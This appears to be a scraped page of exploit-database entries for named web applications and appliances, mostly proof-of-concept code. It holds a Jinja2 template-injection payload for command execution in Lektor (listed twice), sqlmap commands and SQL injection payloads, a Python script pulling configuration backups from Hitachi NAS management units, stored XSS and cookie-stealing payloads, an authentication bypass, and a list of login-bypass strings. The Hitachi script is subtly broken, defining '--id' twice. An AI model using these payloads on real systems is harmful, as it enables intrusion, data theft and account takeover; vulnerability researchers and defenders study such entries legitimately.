<pre><code># Exploit Title: Lektor static content management system Version: 3.3.10 Arbitrary File upload<br /># Date: 20/03/2024<br /># Exploit Author: kai6u<br /># Vendor Homepage: https://www.getlektor.com/<br /># Software Link: https://github.com/lektor/lektor/releases/tag/v3.3.10<br /># Version: 3.3.10<br /># Tested on: Ubuntu 22.04<br /># Summary:<br />Arbitrary File upload in Lektor exist, It is possible to upload file to any directory on the server.<br /> Affected Version:<br /> < Version Release v3.3.10 (https://github.com/lektor/lektor/releases/tag/v3.3.10)<br /> Fixed Version:<br /> Latest Version Release v3.3.11 (https://github.com/lektor/lektor/releases/tag/v3.3.11)<br /># Steps:<br />3.Steps<br />The following are the steps of an attack that an attacker might perform.<br /> 1.Arbitrary File Upload and Store the payload<br /> Access the administrator console and use the Add Page function to create a file<br />containing the payload to the templates directory and prepare to execute the<br />command.<br /> 2.Execute Command<br /> Next, execute arbitrary commands on the administrator console by referencing the<br />file containing the malicious payload as templates<br /><br /># Description:<br />1 ) Access to the administrator console via NW first creates a contetns.lr file containing the payload using Lektor's Add Page feature, specifying the templates directory.(Attacker also can upload to any directory.)<br /><br />Payload:<br /><br />{{ ''.__class__.__mro__[1].__subclasses__()[276]('whoami',shell=True,stdout=-1).communicate()[0].strip()}} }}<br /><br />2 ) Create a new page by specifying the created contents.lr as template.<br /><br />3 ) Use the preview function to check the sample page with the specified templates.<br /><br /># Impact<br />Since attackers can execute arbitrary commands on the target environment, they can.<br /> 1.Steal sensitive files on the server.<br /> 2.Browse like /etc/passwd file and configure it to allow SSH connections as an OS user.<br /> 3.Use the server as a stepping stone for another attack and perform malicious actions.<br /> 4.Encrypt all content in the server and demand money.<br /> 5.Shut down the server and disrupt the target.<br />This is very dangerous because commands can be executed if the administrator's consolecan be accessed via the NW<br /><br /># References<br />https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection/jinja2-ssti<br />https://github.com/lektor/lektor/releases/tag/v3.3.11<br /><br /></code></pre>
<pre><code># Exploit Title: Simple Task List 1.0 - 'status' SQLi<br /># Date: 2023-11-15<br /># Exploit Author: Ersin Erenler<br /># Vendor Homepage: https://code-projects.org/simple-task-list-in-php-with-source-code<br /># Software Link: https://download-media.code-projects.org/2020/12/Simple_Task_List_In_PHP_With_Source_Code.zip<br /># Version: 1.0<br /># Tested on: Windows/Linux, Apache 2.4.54, PHP 8.2.0<br /># CVE : CVE-2023-46023<br /><br />-------------------------------------------------------------------------------<br /><br /># Description:<br /><br />Simple Task List V1.0 is susceptible to a significant security vulnerability that arises from insufficient protection on the 'status' parameter in the addTask.php file. This flaw can potentially be exploited to inject malicious SQL queries, leading to unauthorized access and extraction of sensitive information from the database.<br /><br />Vulnerable File: /addTask.php<br /><br />Parameter Name: status<br /><br /># Proof of Concept:<br />----------------------<br /><br />1. Register and login the system<br />2. Add a project and a task<br />3. Then use the sqlmap to exploit<br />4. sqlmap -u "http://localhost/Tasklist/addTask.php" --headers "Cookie: PHPSESSID=<php-cookie-value>" --method POST --data "name=test&status=N" -p status --risk 3 --level 5 --dbms mysql --batch --current-db<br /><br /># SQLMap Response:<br />----------------------<br />---<br />Parameter: status (POST)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause<br /> Payload: name=test&status=N'||(SELECT 0x59506356 WHERE 1189=1189 AND 7323=7323)||'<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br /> Payload: name=test&status=N'||(SELECT 0x6b786b49 WHERE 7851=7851 AND (SELECT 9569 FROM(SELECT COUNT(*),CONCAT(0x7171787171,(SELECT (ELT(9569=9569,1))),0x716b706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: name=test&status=N'||(SELECT 0x5669775a WHERE 4483=4483 AND (SELECT 3096 FROM (SELECT(SLEEP(5)))iFlC))||'<br />---<br /><br /></code></pre>
<pre><code># Exploit Title: Teacher Subject Allocation Management System 1.0 - 'searchdata' SQLi<br /># Date: 2023-11-15<br /># Exploit Author: Ersin Erenler<br /># Vendor Homepage: https://phpgurukul.com/teacher-subject-allocation-system-using-php-and-mysql<br /># Software Link: https://phpgurukul.com/?sdm_process_download=1&download_id=17645<br /># Version: 1.0<br /># Tested on: Windows/Linux, Apache 2.4.54, PHP 8.2.0<br /># CVE : CVE-2023-46024<br /><br />-------------------------------------------------------------------------------<br /><br /># Description:<br /><br />Teacher Subject Allocation Management System V1.0 is susceptible to a significant security vulnerability that arises from insufficient protection on the 'searchdata' parameter in the index.php file. This flaw can potentially be exploited to inject malicious SQL queries, leading to unauthorized access and extraction of sensitive information from the database.<br /><br />Vulnerable File: /index.php<br /><br />Parameter Name: searchdata<br /><br /># Proof of Concept:<br />----------------------<br /><br />Execute sqlmap using either the 'searchdata' parameter to retrieve the current database:<br /><br />sqlmap -u "http://localhost/Tsas" --method POST --data "searchdata=test&search=" -p searchdata --risk 3 --level 3 --dbms mysql --batch --current-db<br /><br />SQLMap Response:<br />----------------------<br />---<br />Parameter: searchdata (POST)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause<br /> Payload: searchdata=test%' AND 3912=3912 AND 'qxHV%'='qxHV&search=<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br /> Payload: searchdata=test%' AND (SELECT 1043 FROM(SELECT COUNT(*),CONCAT(0x7170706a71,(SELECT (ELT(1043=1043,1))),0x717a787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'kewe%'='kewe&search=<br /><br /> Type: stacked queries<br /> Title: MySQL >= 5.0.12 stacked queries (comment)<br /> Payload: searchdata=test%';SELECT SLEEP(5)#&search=<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: searchdata=test%' AND (SELECT 8862 FROM (SELECT(SLEEP(5)))GqzT) AND 'wylU%'='wylU&search=<br /><br /> Type: UNION query<br /> Title: Generic UNION query (NULL) - 15 columns<br /> Payload: searchdata=test%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170706a71,0x784e7a47626a794a74456975444c5a4c64734556414658476e75684c4a716f6173724b6b6a685163,0x717a787171)-- -&search=<br />---<br /><br /></code></pre>
<pre><code># Exploit Title: Hitachi NAS (HNAS) System Management Unit (SMU) 14.8.7825 - Information Disclosure<br /># CVE: CVE-2023-6538<br /># Date: 2023-12-13<br /># Exploit Author: Arslan Masood (@arszilla)<br /># Vendor: https://www.hitachivantara.com/<br /># Version: < 14.8.7825.01<br /># Tested On: 13.9.7021.04 <br /><br />import argparse<br />from os import getcwd<br /><br />import requests<br /><br />parser = argparse.ArgumentParser(<br /> description="CVE-2023-6538 PoC",<br /> usage="./CVE-2023-6538.py --host <Hostname/FQDN/IP> --id <JSESSIONID> --sso <JSESSIONIDSSO>"<br /> )<br /><br /># Create --host argument:<br />parser.add_argument(<br /> "--host",<br /> required=True,<br /> type=str,<br /> help="Hostname/FQDN/IP Address. Provide the port, if necessary, i.e. 127.0.0.1:8443, example.com:8443"<br /> )<br /><br /># Create --id argument:<br />parser.add_argument(<br /> "--id",<br /> required=True,<br /> type=str,<br /> help="JSESSIONID cookie value"<br /> )<br /><br /># Create --sso argument:<br />parser.add_argument(<br /> "--sso",<br /> required=True,<br /> type=str,<br /> help="JSESSIONIDSSO cookie value"<br /> )<br /><br /># Create --id argument:<br />parser.add_argument(<br /> "--id",<br /> required=True,<br /> type=str,<br /> help="Server ID value"<br /> )<br /><br />args = parser.parse_args()<br /><br />def download_file(hostname, jsessionid, jsessionidsso, serverid):<br /> # Set the filename:<br /> filename = "registry_data.tgz"<br /><br /> # Vulnerable SMU URL:<br /> smu_url = f"https://{hostname}/mgr/app/template/simple%2CDownloadConfigScreen.vm?serverid={serverid}"<br /><br /> # GET request cookies<br /> smu_cookies = {<br /> "JSESSIONID": jsessionid,<br /> "JSESSIONIDSSO": jsessionidsso<br /> }<br /><br /> # GET request headers:<br /> smu_headers = {<br /> "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0",<br /> "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",<br /> "Accept-Language": "en-US,en;q=0.5",<br /> "Accept-Encoding": "gzip, deflate",<br /> "Dnt": "1",<br /> "Referer": f"https://{hostname}/mgr/app/action/serveradmin.ConfigRestoreAction/eventsubmit_doperform/ignored",<br /> "Upgrade-Insecure-Requests": "1",<br /> "Sec-Fetch-Dest": "document",<br /> "Sec-Fetch-Mode": "navigate",<br /> "Sec-Fetch-Site": "same-origin",<br /> "Sec-Fetch-User": "?1",<br /> "Te": "trailers",<br /> "Connection": "close"<br /> }<br /><br /> # Send the request:<br /> with requests.get(smu_url, headers=smu_headers, cookies=smu_cookies, stream=True, verify=False) as file_download:<br /> with open(filename, 'wb') as backup_archive:<br /> # Write the zip file to the CWD:<br /> backup_archive.write(file_download.content)<br /><br /> print(f"{filename} has been downloaded to {getcwd()}")<br /><br />if __name__ == "__main__":<br /> download_file(args.host, args.id, args.sso, args.id)<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: Lektor static content management system Version: 3.3.10 Arbitrary File upload<br /># Date: 20/03/2024<br /># Exploit Author: kai6u<br /># Vendor Homepage: https://www.getlektor.com/<br /># Software Link: https://github.com/lektor/lektor/releases/tag/v3.3.10<br /># Version: 3.3.10<br /># Tested on: Ubuntu 22.04<br /># Summary:<br />Arbitrary File upload in Lektor exist, It is possible to upload file to any directory on the server.<br /> Affected Version:<br /> < Version Release v3.3.10 (https://github.com/lektor/lektor/releases/tag/v3.3.10)<br /> Fixed Version:<br /> Latest Version Release v3.3.11 (https://github.com/lektor/lektor/releases/tag/v3.3.11)<br /># Steps:<br />3.Steps<br />The following are the steps of an attack that an attacker might perform.<br /> 1.Arbitrary File Upload and Store the payload<br /> Access the administrator console and use the Add Page function to create a file<br />containing the payload to the templates directory and prepare to execute the<br />command.<br /> 2.Execute Command<br /> Next, execute arbitrary commands on the administrator console by referencing the<br />file containing the malicious payload as templates<br /><br /># Description:<br />1 ) Access to the administrator console via NW first creates a contetns.lr file containing the payload using Lektor's Add Page feature, specifying the templates directory.(Attacker also can upload to any directory.)<br /><br />Payload:<br /><br />{{ ''.__class__.__mro__[1].__subclasses__()[276]('whoami',shell=True,stdout=-1).communicate()[0].strip()}} }}<br /><br />2 ) Create a new page by specifying the created contents.lr as template.<br /><br />3 ) Use the preview function to check the sample page with the specified templates.<br /><br /># Impact<br />Since attackers can execute arbitrary commands on the target environment, they can.<br /> 1.Steal sensitive files on the server.<br /> 2.Browse like /etc/passwd file and configure it to allow SSH connections as an OS user.<br /> 3.Use the server as a stepping stone for another attack and perform malicious actions.<br /> 4.Encrypt all content in the server and demand money.<br /> 5.Shut down the server and disrupt the target.<br />This is very dangerous because commands can be executed if the administrator's consolecan be accessed via the NW<br /><br /># References<br />https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection/jinja2-ssti<br />https://github.com/lektor/lektor/releases/tag/v3.3.11<br /><br /></code></pre>
<pre><code># Exploit Title: tramyardg autoexpress - Stored Cross-Site Scripting (XSS)<br /># Google Dork: N/A<br /># Date: 11/28/2023<br /># Exploit Author: Scott White<br /># Vendor Homepage: https://github.com/tramyardg/autoexpress<br /># Version: v1.3.0<br /># Tested on: Ubuntu 22.04.3 LTS + Apache/2.4.52<br /># CVE : CVE-2023-48903<br /><br /># References:<br />https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-48903<br />https://www.cve.org/CVERecord?id=CVE-2023-48903<br /><br /># Description:<br />Autoexpress 1.3.0 is affected by a stored cross-site scripting (XSS) feature that allows for an unauthenticated attacker to execute JavaScript commands.<br /><br /># Proof of Concept:<br />+ Go to "http://localhost/autoexpress"<br />+ Craft POST request to /autoexpress/admin/api/uploadCarImages.php within BurpSuite (Repeater)<br />+ The form-data name "imageType[]" is vulnerable<br /><br /># Sample Request<br />POST /autoexpress/admin/api/uploadCarImages.php HTTP/1.1<br />Host: localhost<br />Content-Length: 17016<br />Accept: application/json, text/javascript, */*; q=0.01<br />X-Requested-With: XMLHttpRequest<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36<br />Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9juDWgTa5YsjE2YR<br />Origin: http://localhost<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Connection: close<br /><br />------WebKitFormBoundary9juDWgTa5YsjE2YR<br />Content-Disposition: form-data; name="files[]"; filename="image.jpeg"<br />Content-Type: image/jpeg<br /><br />IMAGE_CONTENT<br /><br />------WebKitFormBoundary9juDWgTa5YsjE2YR<br />Content-Disposition: form-data; name="id"<br /><br />CAR_ID<br /><br />------WebKitFormBoundary9juDWgTa5YsjE2YR<br />Content-Disposition: form-data; name="fd[]"<br /><br />IMAGE_CONTENT_BASE64_ENCODED<br /><br />------WebKitFormBoundary9juDWgTa5YsjE2YR<br /><br />Content-Disposition: form-data; name="imgType[]"<br /><br />data:image/jpeg;base64"onerror=alert(1002)<!--------WebKitFormBoundary9juDWgTa5YsjE2YR--<br /></code></pre>
<pre><code># Exploit Title: tramyardg autoexpress - Authentication Bypass<br /># Google Dork: N/A<br /># Date: 11/28/2023<br /># Exploit Author: Scott White<br /># Vendor Homepage: https://github.com/tramyardg/autoexpress<br /># Version: v1.3.0<br /># Tested on: Ubuntu 22.04.3 LTS + Apache/2.4.52<br /># CVE : CVE-2023-48902<br /><br /># References:<br />https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-48902<br />https://www.cve.org/CVERecord?id=CVE-2023-48902<br /><br /># Description:<br />Autoexpress 1.3.0 allows for authentication bypass via unauthenticated API access to admin functionality. This could allow a remote anonymous attacker to delete or update vehicles as well as upload images for vehicles.<br /><br /># Proof of Concept:<br />+ Go to "http://localhost/autoexpress"<br />+ Craft POST request to /autoexpress/admin/api/uploadCarImages.php within BurpSuite (Repeater)<br /><br /># Sample Request<br />POST /autoexpress/admin/api/uploadCarImages.php HTTP/1.1<br />Host: localhost<br />Content-Length: 17016<br />Accept: application/json, text/javascript, */*; q=0.01<br />X-Requested-With: XMLHttpRequest<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36<br />Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9juDWgTa5YsjE2YR<br />Origin: http://localhost<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Connection: close<br /><br />------WebKitFormBoundary9juDWgTa5YsjE2YR<br />Content-Disposition: form-data; name="files[]"; filename="image.jpeg"<br />Content-Type: image/jpeg<br /><br />IMAGE_CONTENT<br /><br />------WebKitFormBoundary9juDWgTa5YsjE2YR<br />Content-Disposition: form-data; name="id"<br /><br />CAR_ID<br /><br />------WebKitFormBoundary9juDWgTa5YsjE2YR<br />Content-Disposition: form-data; name="fd[]"<br /><br />IMAGE_CONTENT_BASE64_ENCODED<br /><br />------WebKitFormBoundary9juDWgTa5YsjE2YR<br /><br />Content-Disposition: form-data; name="imgType[]"<br /><br />data:image/jpeg;base64------WebKitFormBoundary9juDWgTa5YsjE2YR--<br /></code></pre>
<pre><code># Exploit Title: tramyardg autoexpress - SQL Injection<br /># Google Dork: N/A<br /># Date: 11/28/2023<br /># Exploit Author: Scott White<br /># Vendor Homepage: https://github.com/tramyardg/autoexpress<br /># Version: v1.3.0<br /># Tested on: Ubuntu 22.04.3 LTS + Apache/2.4.52<br /># CVE : CVE-2023-48901<br /><br /># References:<br />https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-48901<br />https://www.cve.org/CVERecord?id=CVE-2023-48901<br /><br /># Description:<br />Autoexpress 1.3.0 allows SQL Injection via parameter 'carId' in /autoexpress/details.php and /autoexpress/admin/inventory.php. This vulnerability allows remote attackers to disclose sensitive information on affected installations.<br /><br /># Proof of Concept:<br />+ Go to "http://localhost/autoexpress/admin/sign-in.php"<br />+ Sign in with Admin credentials<br />+ Click "Manage Inventory" --> "Actions" --> "Manage Photos" while having the "Intercept On" Burp Suite<br />+ Should receive a request of POST - /autoexpress/admin/inventory.php?action=getPhotosByCarId&id=[ID]<br />+ Send it to Repeater<br />+ Captured Burp Request:<br /><br />POST /autoexpress/admin/inventory.php?action=getPhotosByCarId&id=3 HTTP/1.1<br />Host: localhost<br />Content-Length: 0<br />Accept: application/json, text/javascript, */*; q=0.01<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36<br />X-Requested-With: XMLHttpRequest<br />Origin: http://localhost<br />Referer: http://localhost/autoexpress/admin/inventory.php?username=admin<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: PHPSESSID=PHPSESSIONID<br />Connection: close<br /><br /># Sample Request<br />POST /autoexpress/admin/inventory.php?action=getPhotosByCarId&id=3+and+(ascii(substring((select+version()),1,1)))+%3d+56 HTTP/1.1<br />Host: localhost<br />Content-Length: 0<br />Accept: application/json, text/javascript, */*; q=0.01<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36<br />X-Requested-With: XMLHttpRequest<br />Origin: http://localhost<br />Referer: http://localhost/autoexpress/admin/inventory.php?username=admin<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: PHPSESSID=PHPSESSIONID<br />Connection: close<br /></code></pre>
<pre><code>Details:<br /><br />Cross Site Scripting vulnerability in Survey JS Survey Creator v.1.9.132<br />and before allows an attacker to execute arbitrary code via the input field<br />parameters of the creator survey section.<br /><br /> ------------------------------------------<br /><br /> [Vulnerability Type]<br /> Cross Site Scripting (XSS)<br /><br />------------------------------------------<br /><br />[Vendor of Product]<br />SurveyJS<br /><br />------------------------------------------<br />[Affected Product Code Base]<br />Survey Creator - v1.9.132 and before<br /><br />------------------------------------------<br />[Affected Component]<br />In every input field of creator survey section vulnerable to reflected and<br />stored cross-site scripting.<br /><br />------------------------------------------<br />[Attack Type]<br />Context-dependent<br /><br />------------------------------------------<br />[Impact Code execution]<br />true<br /><br />------------------------------------------<br />[Impact Information Disclosure]<br />true<br /><br />------------------------------------------<br />[Attack Vectors]<br />some XSS filter evasion<br /><br />------------------------------------------<br />[Reference]<br />https://github.com/surveyjs/survey-creator/issues/5285<br /><br />------------------------------------------<br />[Has vendor confirmed or acknowledged the vulnerability?]<br />true<br /><br />------------------------------------------<br />[Discoverer]<br />Jettapol Pumwattanakul<br /><br />Use CVE-2024-28635<br /><br />#Proof of concept<br />Insert<br />[>"><img src="x:x" onerror="alert(document.cookie)">]<br />in input fields application reflected cross-site scripting.<br /></code></pre>
<pre><code># Exploit Title: Quick.CMS 6.7 SQL Injection Login Bypass<br /># Google Dork: N/A<br /># Date: 02-03-2024<br /># Exploit Author: ./H4X.Forensics - Diyar<br /># Vendor Homepage: https://www.opensolution.org<https://www.opensolution.org/><br /># Software Link: [https://opensolution.org/download/home.html?sFile=Quick.Cms_v6.7-en.zip]<br /># Version: 6.7<br /># Tested on: Windows<br /># CVE : N/A<br /><br />How to exploit :<br /><br />*--> Open Admin Panel Through : http://127.0.0.1:8080/admin.php<br />*--> Enter any Email like : root@root.com<mailto:root@root.com><br />*--> Enter SQL Injection Authentication Bypass Payload : ' or '1'='1<br />*--> Tick the Checkbox<br />*--> Press Login<br />*--> Congratz!<br /><br /> *--> SQL Injection Authentication Bypass Payload : ' or '1'='1<br /><br />*--> Payloads Can be use :<br /><br />' or '1'='1<br />' or ''='<br />' or 1]%00<br />' or /* or '<br />' or "a" or '<br />' or 1 or '<br />' or true() or '<br /><br /></code></pre>